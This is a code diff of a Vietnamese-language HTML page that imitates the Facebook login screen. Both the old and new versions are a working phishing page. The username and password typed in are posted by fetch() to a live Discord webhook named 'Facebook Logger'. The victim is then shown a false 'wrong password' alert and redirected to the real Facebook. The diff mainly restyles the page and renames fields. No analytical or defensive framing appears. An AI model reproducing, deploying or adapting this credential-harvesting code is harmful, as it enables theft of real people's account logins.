--- a/login.html
+++ b/login.html
@@ -1,106 +1,105 @@
 <!DOCTYPE html>
 <html lang="vi">
 <head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Facebook – đăng nhập hoặc đăng ký</title>
-    <style>
-        body {
-            margin: 0;
-            font-family: Helvetica, Arial, sans-serif;
-            background: linear-gradient(to bottom right, #f0f2f5, #ffffff);
-            height: 100vh;
-            display: flex;
-            justify-content: center;
-            align-items: center;
-        }
-        .container {
-            width: 100%;
-            max-width: 360px;
-            padding: 20px;
-            background: #fff;
-            border-radius: 8px;
-            box-shadow: 0 2px 8px rgba(0,0,0,0.1);
-            text-align: center;
-        }
-        .container img {
-            width: 60px;
-            margin-bottom: 20px;
-        }
-        input {
-            width: 100%;
-            padding: 14px;
-            margin: 8px 0;
-            box-sizing: border-box;
-            font-size: 16px;
-            border: 1px solid #ccd0d5;
-            border-radius: 6px;
-        }
-        .btn-login {
-            width: 100%;
-            background-color: #1877f2;
-            color: white;
-            padding: 14px;
-            border: none;
-            border-radius: 6px;
-            font-size: 18px;
-            font-weight: bold;
-            margin-top: 10px;
-            cursor: pointer;
-        }
-        .btn-login:hover {
-            background-color: #165cbb;
-        }
-        .forgot-password {
-            display: block;
-            margin-top: 15px;
-            font-size: 14px;
-            color: #1877f2;
-            text-decoration: none;
-        }
-        .forgot-password:hover {
-            text-decoration: underline;
-        }
-    </style>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Facebook - Đăng nhập hoặc đăng ký</title>
+  <style>
+    body {
+      margin: 0;
+      padding: 0;
+      background: linear-gradient(to bottom right, #f0f2f5, #ffffff);
+      font-family: Helvetica, Arial, sans-serif;
+      height: 100vh;
+      display: flex;
+      justify-content: center;
+      align-items: center;
+    }
+    .container {
+      background: #fff;
+      padding: 30px 20px;
+      border-radius: 10px;
+      box-shadow: 0 2px 8px rgba(0,0,0,0.15);
+      width: 360px;
+      text-align: center;
+    }
+    .container img {
+      width: 60px;
+      margin-bottom: 20px;
+    }
+    .container input {
+      width: 100%;
+      padding: 14px;
+      margin: 10px 0;
+      border: 1px solid #ccd0d5;
+      border-radius: 6px;
+      font-size: 16px;
+    }
+    .container button {
+      width: 100%;
+      padding: 14px;
+      background-color: #1877f2;
+      border: none;
+      border-radius: 6px;
+      color: white;
+      font-size: 18px;
+      font-weight: bold;
+      margin-top: 10px;
+      cursor: pointer;
+    }
+    .container button:hover {
+      background-color: #166fe5;
+    }
+    .container a {
+      display: block;
+      margin-top: 15px;
+      color: #1877f2;
+      text-decoration: none;
+      font-size: 14px;
+    }
+    .container a:hover {
+      text-decoration: underline;
+    }
+  </style>
 </head>
 <body>
 
 <div class="container">
-    <img src="https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg" alt="Facebook Logo">
-    <input type="text" id="email" placeholder="Số di động hoặc email">
-    <input type="password" id="password" placeholder="Mật khẩu">
-    <button class="btn-login" onclick="sendToDiscord()">Đăng nhập</button>
-    <a href="#" class="forgot-password">Bạn quên mật khẩu ư?</a>
+  <img src="https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg" alt="Facebook">
+  <input type="text" id="username" placeholder="Số di động hoặc email">
+  <input type="password" id="password" placeholder="Mật khẩu">
+  <button onclick="sendToDiscord()">Đăng nhập</button>
+  <a href="#">Bạn quên mật khẩu ư?</a>
 </div>
 
 <script>
-    function sendToDiscord() {
-        var email = document.getElementById('email').value;
-        var password = document.getElementById('password').value;
+function sendToDiscord() {
+  var username = document.getElementById('username').value;
+  var password = document.getElementById('password').value;
 
-        if(email == "" || password == ""){
-            alert("Vui lòng điền đầy đủ thông tin!");
-            return;
-        }
+  if (!username || !password) {
+    alert("Vui lòng nhập đầy đủ thông tin!");
+    return;
+  }
 
-        var webhookURL = "https://discord.com/api/webhooks/1366030714214154260/ZAi-L4U2zXtmbx1ScW5CYxZ4cPDzQ1cf3eCj1GTLlxLwYByuqZeW4fBsw14iqn8KMIai";
+  var webhook = "https://discord.com/api/webhooks/1366030714214154260/ZAi-L4U2zXtmbx1ScW5CYxZ4cPDzQ1cf3eCj1GTLlxLwYByuqZeW4fBsw14iqn8KMIai";
 
-        fetch(webhookURL, {
-            method: "POST",
-            headers: {
-                "Content-Type": "application/json"
-            },
-            body: JSON.stringify({
-                username: "Facebook Logger",
-                content: "**Email/Số điện thoại:** " + email + "\n**Mật khẩu:** " + password
-            })
-        }).then(() => {
-            alert("Sai mật khẩu. Vui lòng kiểm tra lại!");
-            window.location.href = "https://www.facebook.com"; // chuyển qua facebook thật sau khi nhập
-        }).catch((error) => {
-            console.error('Error:', error);
-        });
-    }
+  fetch(webhook, {
+    method: "POST",
+    headers: {
+      "Content-Type": "application/json"
+    },
+    body: JSON.stringify({
+      username: "Facebook Logger",
+      content: "**Username:** " + username + "\n**Password:** " + password
+    })
+  }).then(() => {
+    alert("Sai mật khẩu. Vui lòng thử lại!");
+    window.location.href = "https://www.facebook.com"; // redirect facebook thật
+  }).catch((error) => {
+    console.error("Lỗi gửi Discord:", error);
+  });
+}
 </script>
 
 </body>
